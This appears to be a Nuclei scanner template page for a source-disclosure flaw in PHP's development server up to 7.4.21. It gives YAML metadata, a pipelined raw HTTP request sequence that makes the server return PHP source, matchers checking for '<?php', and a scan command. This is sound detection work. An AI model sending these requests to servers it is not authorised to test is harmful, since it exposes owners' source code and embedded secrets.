PHP Development Server <= 7.4.21 - Remote Source Disclosure

ID: php-src-diclosure

Severity: high

Author: pdteam

Tags: php,phpcli,diclosure,misconfig

Description

A source code disclosure vulnerability in a web server caused by improper handling of multiple requests in quick succession, leading to the server treating requested files as static files instead of executing scripts.

YAML Source

id: php-src-diclosure

info:
  name: PHP Development Server <= 7.4.21 - Remote Source Disclosure
  author: pdteam
  severity: high
  description: |
    A source code disclosure vulnerability in a web server caused by improper handling of multiple requests in quick succession, leading to the server treating requested files as static files instead of executing scripts.
  reference:
    - https://blog.projectdiscovery.io/php-http-server-source-disclosure/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-540
  metadata:
    max-request: 2
  tags: php,phpcli,diclosure,misconfig

http:
  - raw:
      - |+
        GET /  HTTP/1.1
        Host: {{Hostname}}

        GET /{{rand_base(3)}}.{{rand_base(2)}} HTTP/1.1





      - |+
        GET /  HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "<?php")'
          - '!contains(body_2, "<?php")'
        condition: and
# digest: 4b0a00483046022100f78299d8b3574a6444a9cf9af0fca925d58c47cdd03cd9a78704d2134b5f1ff8022100d76a1cfc4cd6acb5caad10e664ad8aa2f8f273b16be8e242152ef558963f0581:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/misconfiguration/php-src-disclosure.yaml"

View on Github